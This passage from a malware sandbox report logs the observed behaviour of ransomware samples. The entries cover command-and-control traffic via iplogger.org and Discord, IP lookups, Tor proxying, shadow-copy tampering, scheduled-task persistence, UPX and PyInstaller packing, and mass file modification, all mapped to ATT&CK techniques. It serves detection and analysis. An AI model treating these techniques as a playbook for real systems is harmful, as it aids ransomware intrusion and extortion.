File created	C:\$Recycle.Bin\S-1-5-21-945322488-2060912225-3527527000-1000\desktop.ini	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service
T1102

Processes:

flow ioc

1075 iplogger.org
1123 iplogger.org
51 discord.com
52 discord.com
1035 iplogger.org
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

15047 freegeoip.app
15043 checkip.dyndns.org
15046 freegeoip.app
Uses Tor communications 1 TTPs
Malware can proxy its traffic through Tor for more anonymity.

Proxy
T1090

flow	ioc
1075	iplogger.org
1123	iplogger.org
51	discord.com
52	discord.com
1035	iplogger.org

flow	ioc
15047	freegeoip.app
15043	checkip.dyndns.org
15046	freegeoip.app

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
behavioral1/memory/7336-32745-0x0000000000400000-0x00000000004CD000-memory.dmp	autoit_exe
behavioral1/memory/7336-36889-0x0000000000400000-0x00000000004CD000-memory.dmp	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

VSSVC.exe

pid process

5048 VSSVC.exe

pid	process
5048	VSSVC.exe

UPX packed file 7 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/5892-1957-0x0000000000400000-0x00000000005BB000-memory.dmp	upx
C:\Program Files\7-Zip\7-zip.chm.exe	upx
behavioral1/memory/5892-3563-0x0000000000400000-0x00000000005BB000-memory.dmp	upx
behavioral1/memory/5892-28605-0x0000000000400000-0x00000000005BB000-memory.dmp	upx
C:\Users\Admin\AppData\Roaming\1.exe	upx
behavioral1/memory/7336-32745-0x0000000000400000-0x00000000004CD000-memory.dmp	upx
behavioral1/memory/7336-36889-0x0000000000400000-0x00000000004CD000-memory.dmp	upx

Drops file in Program Files directory 64 IoCs

Processes:

HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe

description	ioc	process
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Runtime.Loader.dll	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ar.txt	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\ja-JP\ShapeCollector.exe.mui	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Security.Cryptography.X509Certificates.dll	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\hostpolicy.dll	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\ipscht.xml	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.ComponentModel.Annotations.dll	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\api-ms-win-core-timezone-l1-1-0.dll	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.ko-kr.dll	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.sl-si.dll	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\TabIpsps.dll	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\tpcps.dll	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File opened for modification	C:\Program Files\7-Zip\Lang\kab.txt	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\en-US\InkObj.dll.mui	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sv.txt	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\symbols\ja-jp-sym.xml	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\api-ms-win-crt-convert-l1-1-0.dll	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\.version	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Core.dll	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File created	C:\Program Files\Common Files\System\Ole DB\es-ES\oledb32r.dll.mui	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File created	C:\Program Files\Common Files\System\Ole DB\fr-FR\sqlxmlx.rll.mui	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\api-ms-win-core-util-l1-1-0.dll	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Collections.dll	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Net.Sockets.dll	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Runtime.Serialization.Json.dll	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\Microsoft.VisualBasic.Core.dll	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\api-ms-win-crt-conio-l1-1-0.dll	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File created	C:\Program Files\Common Files\System\msadc\fr-FR\msadcer.dll.mui	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.nl-nl.dll	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\it-IT\tabskb.dll.mui	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\sl-SI\tipresx.dll.mui	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\Microsoft.VisualBasic.Core.dll	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sr-spc.txt	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\ja-JP\rtscom.dll.mui	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File created	C:\Program Files\Common Files\System\msadc\msadco.dll	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Collections.NonGeneric.dll	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.da-dk.dll	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File created	C:\Program Files\Common Files\System\en-US\wab32res.dll.mui	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File opened for modification	C:\Program Files\dotnet\host\fxr\8.0.2\hostfxr.dll	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVScripting.dll	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File created	C:\Program Files\Common Files\System\es-ES\wab32res.dll.mui	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\offreg.dll	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\InkObj.dll	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File created	C:\Program Files\Common Files\System\msadc\it-IT\msdaremr.dll.mui	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Diagnostics.TextWriterTraceListener.dll	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\base_kor.xml	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\zh-phonetic.xml	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\VSTO\vstoee.dll	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Text.Json.dll	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\WindowsBase.dll	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\es-ES\InkObj.dll.mui	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\ja-JP\tabskb.dll.mui	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File created	C:\Program Files\Common Files\System\Ole DB\ja-JP\msdasqlr.dll.mui	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Net.dll	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File opened for modification	C:\Program Files\7-Zip\descript.ion	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Net.Quic.dll	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Numerics.dll	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Numerics.Vectors.dll	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File opened for modification	C:\Program Files\7-Zip\Lang\tr.txt	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.cs-cz.dll	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File created	C:\Program Files\Common Files\System\msadc\en-US\msadcer.dll.mui	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Reflection.Emit.Lightweight.dll	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File opened for modification	C:\Program Files\7-Zip\Lang\da.txt	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
File opened for modification	C:\Program Files\7-Zip\7z.dll	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe

Detects Pyinstaller 2 IoCs

pyinstaller

Processes:

resource	yara_rule
C:\Users\Admin\Desktop\00469\HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe	pyinstaller
C:\Users\Admin\Desktop\00469\HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 7 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2500	2724	WerFault.exe	HEUR-Trojan-Ransom.Win32.GandCrypt.gen-9da4a0afc77b63a27fb7643652718624f9b0a69787bb28ceac8f8eb36dd1c30f.exe
1968	280	WerFault.exe	HEUR-Trojan-Ransom.Win32.GandCrypt.gen-6753a843b7a94a0b468d985ef54bd03c5938d1d9414815d00041e07d872367d8.exe
6288	280	WerFault.exe	HEUR-Trojan-Ransom.Win32.GandCrypt.gen-6753a843b7a94a0b468d985ef54bd03c5938d1d9414815d00041e07d872367d8.exe
7928	7696	WerFault.exe	svchost.exe
6892	7696	WerFault.exe	svchost.exe
3404	832	WerFault.exe	HEUR-Trojan.MSIL.Crypt.gen-cce6a07ca807865798a988e8072bded1d0d3b618f9c60082cfd2dc26c079d1ce.exe
1596	6020	WerFault.exe	HEUR-Trojan-Ransom.MSIL.Blocker.gen-c65fc0a1d2472b184f1a25c04fd320428ad06c35c56185b62298be269b1a400c.exe

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

powershell.exezbhnd.exeHEUR-Trojan-Ransom.Win32.Cryptor.gen-d338295d50d5b39d8377c593f6d46feb512823e2724704448cc885b40c5056e0.execmd.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-9da3683e25e6a04588ed2a186829c6baf338c949e1db0fbb25ab9a3ec48cb210.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-c65fc0a1d2472b184f1a25c04fd320428ad06c35c56185b62298be269b1a400c.exeVSSVC.exeHEUR-Trojan-Ransom.Win32.Blocker.pef-c7030efe8c2095f68a46c5daf270c5fd3ac4ca6dcc603a40e7f6f3caea875297.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	zbhnd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Cryptor.gen-d338295d50d5b39d8377c593f6d46feb512823e2724704448cc885b40c5056e0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.MSIL.Blocker.gen-9da3683e25e6a04588ed2a186829c6baf338c949e1db0fbb25ab9a3ec48cb210.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.MSIL.Blocker.gen-c65fc0a1d2472b184f1a25c04fd320428ad06c35c56185b62298be269b1a400c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	VSSVC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Blocker.pef-c7030efe8c2095f68a46c5daf270c5fd3ac4ca6dcc603a40e7f6f3caea875297.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
discovery

Internet Connection Discovery
T1016.001

Processes:

cmd.exePING.EXE

pid process

9100 cmd.exe
9632 PING.EXE

pid	process
9100	cmd.exe
9632	PING.EXE

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exetaskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Direct Volume Access
T1006

Processes:

vssadmin.exe

pid process

7688 vssadmin.exe

pid	process
7688	vssadmin.exe

Modifies registry class 2 IoCs

Processes:

cmd.exeOpenWith.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings	OpenWith.exe

Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

NOTEPAD.EXE

pid process

6640 NOTEPAD.EXE
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

9632 PING.EXE
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

8348 schtasks.exe
9100 schtasks.exe
3656 schtasks.exe
8824 schtasks.exe

pid	process
6640	NOTEPAD.EXE

pid	process
9632	PING.EXE

pid	process
8348	schtasks.exe
9100	schtasks.exe
3656	schtasks.exe
8824	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exetaskmgr.exetaskmgr.exe

pid	process
1768	powershell.exe
1768	powershell.exe
4808	taskmgr.exe
4808	taskmgr.exe
4808	taskmgr.exe
4808	taskmgr.exe
4808	taskmgr.exe
4808	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

taskmgr.exe

pid process

2712 taskmgr.exe

pid	process
2712	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

7zFM.exepowershell.exetaskmgr.exetaskmgr.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-a0ff1900e48cae4ae82ab1afb5a448fef40372f6c1d81a2c2896fd4ce8fd2915.exeHEUR-Trojan-Ransom.MSIL.Agent.gen-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-9da3683e25e6a04588ed2a186829c6baf338c949e1db0fbb25ab9a3ec48cb210.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-c65fc0a1d2472b184f1a25c04fd320428ad06c35c56185b62298be269b1a400c.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exevssvc.exeWMIC.exe

description	pid	process
Token: SeRestorePrivilege	376	7zFM.exe
Token: 35	376	7zFM.exe
Token: SeSecurityPrivilege	376	7zFM.exe
Token: SeDebugPrivilege	1768	powershell.exe
Token: SeDebugPrivilege	4808	taskmgr.exe
Token: SeSystemProfilePrivilege	4808	taskmgr.exe
Token: SeCreateGlobalPrivilege	4808	taskmgr.exe
Token: SeDebugPrivilege	2712	taskmgr.exe
Token: SeSystemProfilePrivilege	2712	taskmgr.exe
Token: SeCreateGlobalPrivilege	2712	taskmgr.exe
Token: 33	4808	taskmgr.exe
Token: SeIncBasePriorityPrivilege	4808	taskmgr.exe
Token: SeDebugPrivilege	384	HEUR-Trojan-Ransom.MSIL.Blocker.gen-a0ff1900e48cae4ae82ab1afb5a448fef40372f6c1d81a2c2896fd4ce8fd2915.exe
Token: SeDebugPrivilege	2684	HEUR-Trojan-Ransom.MSIL.Agent.gen-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe
Token: SeDebugPrivilege	2684	HEUR-Trojan-Ransom.MSIL.Agent.gen-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe
Token: SeDebugPrivilege	2588	HEUR-Trojan-Ransom.MSIL.Blocker.gen-9da3683e25e6a04588ed2a186829c6baf338c949e1db0fbb25ab9a3ec48cb210.exe
Token: SeDebugPrivilege	4532	HEUR-Trojan-Ransom.MSIL.Blocker.gen-c65fc0a1d2472b184f1a25c04fd320428ad06c35c56185b62298be269b1a400c.exe
Token: SeDebugPrivilege	4244	powershell.exe
Token: SeDebugPrivilege	3160	powershell.exe
Token: SeDebugPrivilege	2564	powershell.exe
Token: SeDebugPrivilege	2900	powershell.exe
Token: SeDebugPrivilege	2280	powershell.exe
Token: SeBackupPrivilege	376	vssvc.exe
Token: SeRestorePrivilege	376	vssvc.exe
Token: SeAuditPrivilege	376	vssvc.exe
Token: SeIncreaseQuotaPrivilege	2796	WMIC.exe
Token: SeSecurityPrivilege	2796	WMIC.exe
Token: SeTakeOwnershipPrivilege	2796	WMIC.exe
Token: SeLoadDriverPrivilege	2796	WMIC.exe
Token: SeSystemProfilePrivilege	2796	WMIC.exe
Token: SeSystemtimePrivilege	2796	WMIC.exe
Token: SeProfSingleProcessPrivilege	2796	WMIC.exe
Token: SeIncBasePriorityPrivilege	2796	WMIC.exe
Token: SeCreatePagefilePrivilege	2796	WMIC.exe
